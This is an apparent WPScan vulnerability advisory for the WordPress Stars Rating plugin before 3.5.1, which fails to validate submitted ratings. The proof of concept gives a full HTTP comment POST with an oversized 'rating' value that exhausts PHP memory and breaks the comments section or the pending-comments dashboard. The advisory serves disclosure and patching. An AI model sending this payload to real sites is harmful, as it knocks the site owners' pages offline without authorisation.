WordPress Plugin Vulnerabilities
Stars Rating < 3.5.1 - Comments Denial of Service
Description
The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service in the comments section, or pending comment dashboard depending if the user sent it as unauthenticated or authenticated.
Proof of Concept
Enable rating for a post/page, add a comment, capture the request in Burp Change the POST Parameter "rating" to a large integer. POST /wp-comments-post.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 139 Connection: close Upgrade-Insecure-Requests: 1 rating=1000000000000000000&comment=aa&author=aa&email=aa%40aa.com&url=&submit=Post+Comment&comment_post_ID=2123&comment_parent=0 Then forward it. The DoS can be seen in the pending comment dashboard for unauthenticated comments, otherwise (authenticated comment), the comment section on the post will not load properly and will have an error such as Allowed memory size of 268435456 bytes exhausted (tried to allocate 232783904 bytes) in /var/www/wp-content/plugins/stars-rating/public/stars-rating-public.php on line 312
Affects Plugins
Fixed in 3.5.1 References
CVE
Miscellaneous
Original Researcher
Drew Jones
Submitter
Drew Jones
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-06 (about 2 years ago)
Added
2021-12-06 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)
WPScan 